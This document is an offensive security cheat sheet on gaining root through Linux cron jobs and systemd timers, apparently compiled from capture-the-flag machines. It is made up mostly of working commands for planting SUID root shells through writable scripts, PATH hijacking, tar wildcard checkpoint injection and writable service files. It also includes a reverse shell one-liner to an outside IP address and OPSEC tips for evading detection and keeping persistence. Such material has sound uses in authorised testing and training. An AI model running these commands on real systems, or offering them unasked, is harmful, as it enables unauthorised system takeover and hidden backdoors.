Cron Job Exploitation
#Overview
Cron jobs are scheduled tasks that run at specified intervals with the privileges of their owner (often root). When a cron job executes a writable script, uses a script with no absolute paths (PATH hijacking), or contains wildcard characters that can be exploited, it becomes a privilege escalation vector. The key insight: if root executes something you can modify, you become root.
#Prerequisites
- User-level shell access
- Read access to cron directories and scripts
- Write access to at least one component of the cron execution chain
#Detection & Enumeration
# System-wide crontab
cat /etc/crontab
# Cron directories
ls -la /etc/cron.d/
ls -la /etc/cron.daily/
ls -la /etc/cron.hourly/
ls -la /etc/cron.weekly/
ls -la /etc/cron.monthly/
# User crontabs
ls -la /var/spool/cron/crontabs/
cat /var/spool/cron/crontabs/root
# anacron (for systems that don't run 24/7)
cat /etc/anacrontab
# systemd timers (modern alternative to cron)
systemctl list-timers --all
# Use pspy to observe cron execution without root
# pspy64 shows commands run by other users including root
./pspy64 -p -i 1000
BASH
#Exploitation / Execution
#Writable Cron Scripts or Binaries
# Find cron-related files that are world-writable
find /etc/cron* -writable -type f 2>/dev/null
find /var/spool/cron/crontabs -writable -type f 2>/dev/null
# If a cron script is writable:
echo 'cp /bin/bash /tmp/rootbash; chmod 4755 /tmp/rootbash' >> /etc/cron.hourly/cleanup.sh
# Wait for cron to execute, then:
/tmp/rootbash -p
# Or direct reverse shell:
echo 'bash -i >& /dev/tcp/10.10.14.5/4444 0>&1' >> /etc/cron.daily/backup.sh
BASH
#PATH Hijacking in Cron Jobs
When a cron job uses commands without absolute paths:
# Read the cron job script
cat /etc/crontab
# If PATH is set to /tmp or a writable directory, or if a script calls 'ls' without /bin/ls:
# Check what the script runs without absolute paths
cat /etc/cron.d/cleanup
# If it calls: tar, gzip, rsync, find (without absolute paths)
# Create a malicious replacement in a directory that's first in cron's PATH
echo '#!/bin/bash
cp /bin/bash /tmp/rootbash
chmod 4755 /tmp/rootbash' > /tmp/tar
chmod +x /tmp/tar
# Wait for cron to run the job
# Execute /tmp/rootbash -p for root shell
BASH
#Wildcard Injection in Cron Jobs
When a cron job uses tar or other commands with wildcards:
# Tar wildcard exploitation:
# If root's cron runs: tar -czf /backup/backup.tar.gz /var/www/*
# Exploit:
# Create checkpoint files in the directory being archived
echo '#!/bin/bash
cp /bin/bash /tmp/rootbash
chmod 4755 /tmp/rootbash' > /var/www/shell.sh
chmod +x /var/www/shell.sh
# Create tar checkpoint files (tar interprets these as options when wildcard expands)
touch /var/www/--checkpoint=1
touch /var/www/--checkpoint-action=exec=/var/www/shell.sh
# When tar runs, --checkpoint-action executes the script as the cron user (root)
BASH
#pspy for Cron Detection
pspy is invaluable for discovering hidden cron jobs:
# Download and run pspy to monitor processes without root
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64
chmod +x pspy64
./pspy64 -p -i 1000 # Poll every 1000ms
# pspy shows:
# - Commands executed by root and other users
# - Full command lines, arguments, working directory
# - Frequency of execution (helps identify cron intervals)
# - Cron jobs not visible in /etc/crontab (e.g., set via `crontab -e`)
BASH
#Systemd Timers (Cron Alternative)
# List all timers
systemctl list-timers --all
# Inspect a specific timer
systemctl cat cleanup.timer
systemctl cat cleanup.service
# If the service file is writable:
# Modify ExecStart to spawn a shell
echo '[Service]
ExecStart=/bin/bash -c "cp /bin/bash /tmp/rootbash; chmod 4755 /tmp/rootbash"
' > /etc/systemd/system/writable-service.service
systemctl daemon-reload
# Wait for timer or restart service
/tmp/rootbash -p
BASH
#anacron Jobs
# Check anacron configuration
cat /etc/anacrontab
# Same exploitation methods as cron -- writable scripts, PATH hijacking, wildcards
BASH
#Missing Directories in Cron PATH
# Check cron's PATH variable
cat /etc/crontab | grep PATH
# If a directory in cron's PATH doesn't exist, create it and plant a malicious binary
# Example: PATH=/home/user/.local/bin:/usr/local/sbin:/usr/local/bin:/sbin:/bin
# If /home/user/.local/bin doesn't exist:
mkdir -p /home/user/.local/bin
echo '#!/bin/bash
cp /bin/bash /tmp/rootbash
chmod 4755 /tmp/rootbash' > /home/user/.local/bin/<command_called_without_path>
chmod +x /home/user/.local/bin/<command>
BASH
#Common Pitfalls
- Waiting for cron job to execute -- check timestamps with
ls -la /tmp/rootbashto see if it was created - Not checking ALL cron directories (hourly, daily, weekly, monthly, cron.d, user crontabs, anacron)
- Assuming /etc/crontab lists everything -- user crontabs (
crontab -e) are in /var/spool/cron/ - Cron PATH is often different from user PATH -- check it explicitly
- Newer systems use systemd timers instead of cron -- don't overlook them
- Tar wildcard exploits may not work if tar has been patched against this specific attack
#OPSEC Considerations
- Reading /etc/crontab is standard admin behavior, not monitored.
- Creating files in world-writable directories is normal but creating files named
--checkpoint=1is suspicious. - Cron modifications are logged if auditd or specific cron logging is enabled.
- pspy generates sustained process monitoring activity that may be flagged by EDR.
- Creating a SUID /tmp/rootbash is very noisy -- prefer ephemeral shells or SSH key injection.
#Post-Exploitation Value
Cron exploitation provides root command execution at the next cron interval. Results can persist through reboots if the malicious script is not detected. Direct root shell access or SUID backdoor enables full system compromise.
#Cross-References
#Tool References
| Tool | Link |
|---|---|
| pspy | https://github.com/DominicBreuker/pspy |
#Source Machines
- Generic Linux - Cron wildcard injection with tar
- Monitored (Medium, Linux) - Systemd timer + cron-like service abuse